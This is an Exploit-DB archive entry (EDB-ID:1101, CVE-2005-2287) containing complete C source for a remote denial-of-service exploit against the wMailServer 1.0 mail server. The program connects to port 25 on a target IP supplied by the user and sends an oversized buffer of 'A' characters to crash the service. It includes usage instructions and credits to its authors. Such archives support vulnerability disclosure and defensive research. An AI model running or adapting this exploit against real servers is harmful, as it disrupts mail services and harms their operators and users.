wMailServer 1.0 - Remote Denial of Service Exploit

2005-07-12T00:00:00
ID EDB-ID:1101
Type exploitdb
Reporter Kozan
Modified 2005-07-12T00:00:00

Description

wMailServer 1.0 Remote Denial of Service Exploit. CVE-2005-2287. Dos exploit for windows platform

                                        
                                            /*****************************************************************

wMailServer Remote D.o.S Exploit by Kozan

Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com

Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char *argv[])
{
       fprintf(stdout, "wMailServer Remote D.o.S Exploit by Kozan\n");
       fprintf(stdout, "Discovered by: fRoGGz - SecuBox Labs\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA, fRoGGz, SecuBox Labs\n\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n");

       if(argc<2)
       {
               fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(25);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       if( send(sock,Buff,strlen(Buff),0) == -1 )
       {
               fprintf(stderr, "DoS string could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-07-12]